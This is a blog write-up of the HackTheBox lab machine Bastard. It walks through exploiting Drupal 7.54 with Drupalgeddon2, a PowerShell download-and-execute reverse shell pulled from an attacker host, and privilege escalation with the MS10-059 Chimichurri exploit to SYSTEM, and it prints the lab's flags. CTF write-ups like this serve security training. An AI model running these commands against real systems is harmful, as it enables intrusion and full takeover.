Post

HackTheBox Bastard

Writeup for HackTheBox Bastard

Posted Updated
By Edwin Tok
4 min read
HackTheBox Bastard

Machine Synopsis

Bastard is not overly challenging, however it requires some knowledge of PHP in order to modify and use the proof of concept required for initial entry. This machine demonstrates the potential severity of vulnerabilities in content management systems. (Source)

Key Exploitation Techniques:

  • Drupal 7.x Remote Code Execution (Drupalgeddon2 - CVE-2018-7600)
  • PowerShell Reverse Shell (Nishang)
  • Windows Kernel Privilege Escalation (MS10-059)

Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

$ nmap -sC -sV -A 10.10.10.9 

PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
|_http-server-header: Microsoft-IIS/7.5
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC

website

Attempts to brute-force the login page or register accounts were unsuccessful.

The CHANGELOG.txt file (filtered by robots.txt but publicly accessible) revealed the specific version: Drupal 7.54.

changelog

Exploitation

Initial Access (NT AUTHORITY\IUSR)

Drupal 7.54 is vulnerable to Drupalgeddon2 (CVE-2018-7600), a critical remote code execution vulnerability. A Python exploit script for this was used. The script required the highline Ruby gem to be installed.

1
2
3
4
5
6
7
8
9

$ git clone https://github.com/dreadlocked/Drupalgeddon2
$ cd Drupalgeddon2
$ gem install highline
$ ruby drupalgeddon2.rb
Usage: ruby drupalggedon2.rb <target> [--authentication] [--verbose]
Example for target that does not require authentication:
       ruby drupalgeddon2.rb https://example.com
Example for target that does require authentication:
       ruby drupalgeddon2.rb https://example.com --authentication

The exploit successfully identified the Drupal version and confirmed code execution, but failed to write a web shell directly to disk. This forced direct OS command execution through the vulnerability.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.10.10.9/
[+] Found  : http://10.10.10.9/CHANGELOG.txt   (HTTP Response: 200)
[+] Drupal!: v7.54
...
[*] Testing: Code Execution   (Method: name)
[i] Payload: echo SKJNUYPS
[+] Result : SKJNUYPS
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
...
[!] FAILED : Couldn't find a writeable web path
--------------------------------------------------------------------------------
[*] Dropping back to direct OS commands
drupalgeddon2>> whoami
nt authority\iusr

The shell within the drupalgeddon2 script confirmed execution as nt authority\iusr. To gain a more stable and interactive shell, Nishang’s Invoke-PowerShellTcp reverse shell was used.

The shell.ps1 script (containing Invoke-PowerShellTcp) was hosted on an attacker-controlled HTTP server.

1
2
3

# Attacker machine: Host shell.ps1
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 ([http://0.0.0.0:80/](http://0.0.0.0:80/)) ...

The PowerShell script was executed on the target via the Drupalgeddon2 shell.

1

drupalgeddon2>> powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.9/shell.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.9 -Port 1234

A netcat listener was set up to catch the reverse shell.

1
2

# Attacker machine: Netcat listener
$ nc -nlvp 1234

1
2
3
4
5
6
7

listening on [any] 1234 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.9] 49443
Windows PowerShell running as user BASTARD$ on BASTARD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\inetpub\drupal-7.54> whoami
nt authority\iusr

A stable PowerShell shell was obtained as nt authority\iusr.

Privilege Escalation

Windows Kernel Exploit (MS10-059)

systeminfo was used to gather operating system details for privilege escalation.

1
2
3
4
5
6
7
8

PS C:\inetpub\drupal-7.54> systeminfo
...
    Host Name:                  BASTARD
    OS Name:                    Microsoft Windows Server 2008 R2 Datacenter 
    OS Version:                 6.1.7600 N/A Build 7600
    System Type:                x64-based PC
    Hotfix(s):                  N/A
...

The system was identified as Microsoft Windows Server 2008 R2 Datacenter. Windows-Exploit-Suggester was used to identify applicable local privilege escalation exploits.

1
2
3
4
5
6
7

$ git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
$ mousepad systeminfo.txt
$ Windows-Exploit-Suggester/windows-exploit-suggester.py --update                             
$ Windows-Exploit-Suggester/windows-exploit-suggester.py --database 2022-04-21-mssb.xls --systeminfo systeminfo.txt
...
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
...

The suggester highlighted MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799). The exploit for this vulnerability, Chimichurri.exe, was downloaded.

Chimichurri.exe was hosted on an impacket SMB server for transfer to the target.

1

$ python /opt/impacket-0.9.19/examples/smbserver.py share .

On the target, net use was used to map the SMB share, and Chimichurri.exe was copied.

1
2

PS C:\inetpub\drupal-7.54> net use \\10.10.14.9\share
PS C:\inetpub\drupal-7.54> copy \\10.10.14.9\share\Chimichurri.exe

A netcat listener was set up. Chimichurri.exe was executed with the attacker’s IP and a chosen port, initiating a reverse shell with nt authority\system privileges

1

PS C:\inetpub\drupal-7.54> .\Chimichurri.exe 10.10.14.9 9999

1
2

$ nc -nlvp 9999             
listening on [any] 9999 ...

1
2
3
4
5
6
7
8
9
10

connect to [10.10.14.9] from (UNKNOWN) [10.10.10.9] 49447
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\inetpub\drupal-7.54>whoami
nt authority\system
C:\inetpub\drupal-7.54>type dimitris\Desktop\user.txt
6be104d8d9844053846a3bada22a202c
C:\inetpub\drupal-7.54>type administrator\Desktop\root.txt
b31f4550141382cae0433214a2e97152

The user.txt and root.txt flags were located.

HackTheBox
windows
This post is licensed under CC BY 4.0 by the author.